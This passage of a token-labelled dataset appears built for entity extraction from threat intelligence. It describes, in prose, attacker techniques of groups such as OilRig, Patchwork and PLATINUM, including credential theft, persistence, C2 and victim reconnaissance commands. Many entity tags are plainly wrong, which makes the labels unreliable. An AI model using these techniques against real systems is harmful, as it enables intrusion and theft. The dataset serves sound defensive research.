"tunneling", "tools", "to", "tunnel", "RDP", "into", "the", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "Putty", "to", "access", "compromised", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "created", "scheduled", "tasks", "that", "run", "a", "VBScript", "to", "execute", "a", "payload", "on", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "a", "tool", "called", "CANDYKING", "to", "capture", "a", "screenshot", "of", "user's", "desktop." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "sent", "spearphising", "emails", "with", "malicious", "attachments", "to", "potential", "victims", "using", "compromised", "and/or", "spoofed", "email", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "OilRig", "has", "sent", "spearphising", "emails", "with", "malicious", "links", "to", "potential", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "LinkedIn", "to", "send", "spearphishing", "links." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "OilRig", "has", "used", "macros", "to", "verify", "if", "a", "mouse", "is", "connected", "to", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "run", "<code>hostname</code>", "and", "<code>systeminfo</code>", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "run", "<code>ipconfig", "/all</code>", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "<code>netstat", "-an</code>", "on", "a", "victim", "to", "get", "a", "listing", "of", "network", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "run", "<code>whoami</code>", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "<code>sc", "query</code>", "on", "a", "victim", "to", "gather", "information", "about", "services." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "compromised", "credentials", "to", "access", "other", "systems", "on", "a", "victim", "network." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "VBScript", "macros", "for", "execution", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "web", "shells,", "often", "to", "maintain", "access", "to", "a", "victim", "network." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "macros", "to", "deliver", "malware", "such", "as", "QUADAGENT", "and", "OopsIE.", "OilRig", "has", "used", "batch", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "credential", "dumping", "tool", "named", "VALUEVAULT", "to", "steal", "credentials", "from", "the", "Windows", "Credential", "Manager." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OilRig", "has", "used", "WMI", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Orangeworm", "has", "copied", "its", "backdoor", "across", "open", "network", "shares,", "including", "ADMIN$,", "C$WINDOWS,", "D$WINDOWS,", "and", "E$WINDOWS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Orangeworm", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "PLATINUM", "is", "capable", "of", "using", "Windows", "hook", "interfaces", "for", "information", "gathering", "such", "as", "credential", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "B-Way", "B-Features" ] }, { "tokens": [ "PLATINUM", "has", "sometimes", "used", "drive-by", "attacks", "against", "vulnerable", "browser", "plugins." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PLATINUM", "has", "leveraged", "a", "zero-day", "vulnerability", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Features", "B-Exp", "O", "O", "O" ] }, { "tokens": [ "PLATINUM", "has", "transferred", "files", "using", "the", "Intel®", "Active", "Management", "Technology", "(AMT)", "Serial-over-LAN", "(SOL)", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PLATINUM", "has", "used", "several", "different", "keyloggers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PLATINUM", "has", "used", "keyloggers", "that", "are", "also", "capable", "of", "dumping", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PLATINUM", "has", "attempted", "to", "get", "users", "to", "open", "malicious", "files", "by", "sending", "spearphishing", "emails", "with", "attachments", "to", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PLATINUM", "has", "renamed", "rar.exe", "to", "avoid", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "PLATINUM", "has", "used", "the", "Intel®", "Active", "Management", "Technology", "(AMT)", "Serial-over-LAN", "(SOL)", "channel", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Time", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLATINUM", "has", "used", "various", "methods", "of", "process", "injection", "including", "hot", "patching." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Way", "B-Way" ] }, { "tokens": [ "PLATINUM", "has", "sent", "spearphishing", "emails", "with", "attachments", "to", "victims", "as", "its", "primary", "initial", "access", "vector." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POLONIUM", "has", "used", "OneDrive", "and", "DropBox", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "POLONIUM", "has", "exfiltrated", "stolen", "data", "to", "POLONIUM-owned", "OneDrive", "and", "Dropbox", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "POLONIUM", "has", "used", "the", "AirVPN", "service", "for", "operational", "activity." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "I-OffAct", "O" ] }, { "tokens": [ "POLONIUM", "has", "obtained", "and", "used", "tools", "such", "as", "AirVPN", "and", "plink", "in", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "POLONIUM", "has", "used", "compromised", "credentials", "from", "an", "IT", "company", "to", "target", "downstream", "customers", "including", "a", "law", "firm", "and", "aviation", "company." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "I-Way", "O", "O", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O", "I-Org", "O" ] }, { "tokens": [ "POLONIUM", "has", "used", "valid", "compromised", "credentials", "to", "gain", "access", "to", "victim", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POLONIUM", "has", "created", "and", "used", "legitimate", "Microsoft", "OneDrive", "accounts", "for", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "signed", "code", "with", "self-signed", "certificates." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "created", "self-signed", "certificates", "to", "sign", "malicious", "installers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "created", "self-signed", "digital", "certificates", "for", "use", "in", "HTTPS", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "used", "watering", "hole", "attacks", "to", "deliver", "malicious", "versions", "of", "legitimate", "installers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "created", "admin", "accounts", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "I-OffAct", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "attempted", "to", "get", "users", "to", "execute", "compromised", "installation", "files", "for", "legitimate", "software", "including", "compression", "applications,", "security", "software,", "browsers,", "file", "recovery", "applications,", "and", "other", "tools", "and", "utilities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "I-Tool", "O", "B-Way", "B-Purp", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "named", "services", "to", "appear", "legitimate." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "disguised", "malicious", "installer", "files", "by", "bundling", "them", "with", "legitimate", "software", "installers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "used", "a", "script", "that", "configures", "the", "knockd", "service", "and", "firewall", "to", "only", "accept", "C2", "connections", "from", "systems", "that", "use", "a", "specified", "sequence", "of", "knock", "ports." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "used", "Registry", "run", "keys", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PROMETHIUM", "has", "created", "new", "services", "and", "modified", "existing", "services", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "encrypted", "the", "collected", "files'", "path", "with", "AES", "and", "then", "encoded", "them", "with", "base64." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "developed", "a", "file", "stealer", "to", "search", "C:\\", "and", "collect", "files", "with", "certain", "extensions.", "Patchwork", "also", "executed", "a", "script", "to", "enumerate", "all", "drives,", "store", "them", "as", "a", "list,", "and", "upload", "generated", "files", "to", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "has", "used", "BITS", "jobs", "to", "download", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "Patchwork", "apparently", "altered", "NDiskMonitor", "samples", "by", "adding", "four", "bytes", "of", "random", "letters", "in", "a", "likely", "attempt", "to", "change", "the", "file", "hashes." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "bypassed", "User", "Access", "Control", "(UAC)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "has", "signed", "malware", "with", "self-signed", "certificates", "from", "fictitious", "and", "spoofed", "legitimate", "software", "companies." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O" ] }, { "tokens": [ "Patchwork", "has", "created", "self-signed", "certificates", "from", "fictitious", "and", "spoofed", "legitimate", "software", "companies", "that", "were", "later", "used", "to", "sign", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "has", "obfuscated", "a", "script", "with", "Crypto", "Obfuscator." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Patchwork", "dumped", "the", "login", "data", "database", "from", "<code>\\AppData\\Local\\Google\\Chrome\\User", "Data\\Default\\Login", "Data</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Patchwork", ".dll", "that", "contains", "BADNEWS", "is", "loaded", "and", "executed", "using", "DLL", "side-loading." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-HackOrg" ] }, { "tokens": [ "Patchwork", "collected", "and", "exfiltrated", "files", "from", "the", "infected", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "hides", "base64-encoded", "and", "encrypted", "C2", "server", "locations", "in", "comments", "on", "legitimate", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "has", "used", "watering", "holes", "to", "deliver", "files", "with", "exploits", "to", "initial", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "leveraged", "the", "DDE", "protocol", "to", "deliver", "their", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "uses", "malicious", "documents", "to", "deliver", "remote", "execution", "exploits", "as", "part", "of.", "The", "group", "has", "previously", "exploited", "CVE-2017-8570,", "CVE-2012-1856,", "CVE-2014-4114,", "CVE-2017-0199,", "CVE-2017-11882,", "and", "CVE-2015-1641." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "B-Features", "B-Features", "B-Features", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Patchwork", "removed", "certain", "files", "and", "replaced", "them", "so", "they", "could", "not", "be", "retrieved." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Patchwork", "payload", "has", "searched", "all", "fixed", "drives", "on", "the", "victim", "for", "files", "matching", "a", "specified", "list", "of", "extensions." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "apparently", "altered", "NDiskMonitor", "samples", "by", "adding", "four", "bytes", "of", "random", "letters", "in", "a", "likely", "attempt", "to", "change", "the", "file", "hashes." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "payloads", "download", "additional", "files", "from", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "copied", "all", "targeted", "files", "to", "a", "directory", "called", "index", "that", "was", "eventually", "uploaded", "to", "the", "C&C", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "embedded", "a", "malicious", "macro", "in", "a", "Word", "document", "and", "lured", "the", "victim", "to", "click", "on", "an", "icon", "to", "execute", "the", "malware." ], "ner_tags": [ "B-Idus", "B-Way", "O", "B-Way", "B-Way", "O", "O", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "has", "used", "spearphishing", "with", "links", "to", "try", "to", "get", "users", "to", "click,", "download", "and", "open", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "installed", "its", "payload", "in", "the", "startup", "programs", "folder", "as", "\"Baidu", "Software", "Update.\"", "The", "group", "also", "adds", "its", "second", "stage", "payload", "to", "the", "startup", "programs", "as", "“Net", "Monitor.\"", "They", "have", "also", "dropped", "QuasarRAT", "binaries", "as", "files", "named", "microsoft_network.exe", "and", "crome.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "A", "Patchwork", "payload", "deletes", "Resiliency", "Registry", "keys", "created", "by", "Microsoft", "Office", "applications", "in", "an", "apparent", "effort", "to", "trick", "users", "into", "thinking", "there", "were", "no", "issues", "during", "application", "runs." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "used", "PowerSploit", "to", "download", "payloads,", "run", "a", "reverse", "shell,", "and", "execute", "malware", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Patchwork", "payload", "uses", "process", "hollowing", "to", "hide", "the", "UAC", "bypass", "vulnerability", "exploitation", "inside", "svchost.exe." ], "ner_tags": [ "O", "B-Idus", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Patchwork", "has", "added", "the", "path", "of", "its", "second-stage", "malware", "to", "the", "startup", "folder", "to", "achieve", "persistence.", "One", "of", "its", "file", "stealers", "has", "also", "persisted", "by", "adding", "a", "Registry", "Run", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool", "B-Tool", "B-Way" ] }, { "tokens": [ "Patchwork", "attempted", "to", "use", "RDP", "to", "move", "laterally." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "A", "Patchwork", "file", "stealer", "can", "run", "a", "TaskScheduler", "DLL", "to", "add", "persistence." ], "ner_tags": [ "O", "B-Idus", "I-SamFile", "B-SecTeam", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "scanned", "the", "“Program", "Files”", "directories", "for", "a", "directory", "with", "the", "string", "“Total", "Security”", "(the", "installation", "path", "of", "the", "“360", "Total", "Security”", "antivirus", "tool)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Patchwork", "payload", "was", "packed", "with", "UPX." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Patchwork", "has", "used", "spearphishing", "with", "an", "attachment", "to", "deliver", "files", "with", "exploits", "to", "initial", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "has", "used", "spearphishing", "with", "links", "to", "deliver", "files", "with", "exploits", "to", "initial", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "has", "used", "embedded", "image", "tags", "(known", "as", "web", "bugs)", "with", "unique,", "per-recipient", "tracking", "links", "in", "their", "emails", "for", "the", "purpose", "of", "identifying", "which", "recipients", "opened", "messages." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "used", "Base64", "to", "encode", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "collected", "the", "victim", "computer", "name,", "OS", "version,", "and", "architecture", "type", "and", "sent", "the", "information", "to", "its", "C2", "server.", "Patchwork", "also", "enumerated", "all", "available", "drives", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "collected", "the", "victim", "username", "and", "whether", "it", "was", "running", "as", "admin,", "then", "sent", "the", "information", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "has", "obtained", "and", "used", "open-source", "tools", "such", "as", "QuasarRAT." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Patchwork", "used", "Visual", "Basic", "Scripts", "(VBS)", "on", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "B-Tool", "I-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Patchwork", "ran", "a", "reverse", "shell", "with", "Meterpreter.", "Patchwork", "used", "JavaScript", "code", "and", ".SCT", "files", "on", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Idus", "O", "B-Way", "B-Tool", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "PittyTiger", "has", "obtained", "and", "used", "tools", "such", "as", "Mimikatz", "and", "gsecdump." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "PittyTiger", "attempts", "to", "obtain", "legitimate", "credentials", "during", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Poseidon", "Group", "searches", "for", "administrator", "accounts", "on", "both", "the", "local", "victim", "machine", "and", "the", "network." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Poseidon", "Group", "searches", "for", "administrator", "accounts", "on", "both", "the", "local", "victim", "machine", "and", "the", "network." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Poseidon", "Group", "tools", "attempt", "to", "spoof", "anti-virus", "processes", "as", "a", "means", "of", "self-defense." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Poseidon", "Group", "conducts", "credential", "dumping", "on", "victims,", "with", "a", "focus", "on", "obtaining", "credentials", "belonging", "to", "domain", "and", "database", "servers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Poseidon", "Group's", "Information", "Gathering", "Tool", "(IGT)", "includes", "PowerShell", "components." ], "ner_tags": [ "O", "B-Idus", "B-HackOrg", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "After", "compromising", "a", "victim,", "Poseidon", "Group", "lists", "all", "running", "processes." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Poseidon", "Group", "obtains", "and", "saves", "information", "about", "victim", "network", "interfaces", "and", "addresses." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "compromising", "a", "victim,", "Poseidon", "Group", "discovers", "all", "running", "services." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Malware", "used", "by", "Putter", "Panda", "attempts", "to", "terminate", "processes", "corresponding", "to", "two", "components", "of", "Sophos", "Anti-Virus", "(SAVAdminService.exe", "and", "SavService.exe)." ], "ner_tags": [ "B-Way", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "An", "executable", "dropped", "onto", "victims", "by", "Putter", "Panda", "aims", "to", "inject", "the", "specified", "DLL", "into", "a", "process", "that", "would", "normally", "be", "accessing", "the", "network,", "including", "Outlook", "Express", "(msinm.exe),", "Outlook", "(outlook.exe),", "Internet", "Explorer", "(iexplore.exe),", "and", "Firefox", "(firefox.exe)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Idus", "O", "B-Tool", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Droppers", "used", "by", "Putter", "Panda", "use", "RC4", "or", "a", "16-byte", "XOR", "key", "consisting", "of", "the", "bytes", "0xA0", "–", "0xAF", "to", "obfuscate", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "dropper", "used", "by", "Putter", "Panda", "installs", "itself", "into", "the", "ASEP", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "with", "a", "value", "named", "McUpdate." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "RTM", "has", "used", "search", "order", "hijacking", "to", "force", "TeamViewer", "to", "load", "a", "malicious", "DLL." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "used", "an", "RSS", "feed", "on", "Livejournal", "to", "update", "a", "list", "of", "encrypted", "C2", "server", "names." ], "ner_tags": [ "B-Org", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "distributed", "its", "malware", "via", "the", "RIG", "and", "SUNDOWN", "exploit", 